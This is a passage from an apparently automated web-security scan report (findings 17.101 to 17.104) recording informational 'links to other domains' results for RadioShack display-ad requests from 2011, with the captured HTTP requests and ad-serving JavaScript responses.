http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1421913197?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1421913197?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1421913197?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1421913197?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1421913197?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1421913197?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1421913197/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1421913197?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1421913197?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.101. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10105242535@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2000985820?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2000985820?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:55:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2000985820?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=51370141=_4d436570,0105242535,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=51370141/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2000985820/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2000985820?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2000985820?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.102. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2145795389?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2145795389?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10465427522@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296268925

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2145795389?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=32985151=_4d437fb0,0465427522,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=32985151/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/2145795389/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2145795389?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=2145795389?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.103. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=845536281?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=845536281?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/10582313713@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270656

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:16:00 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=845536281?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=48780829=_4d438665,0582313713,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=48780829/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/845536281/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=845536281?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=845536281?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.104. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=682100952?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=682100952?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
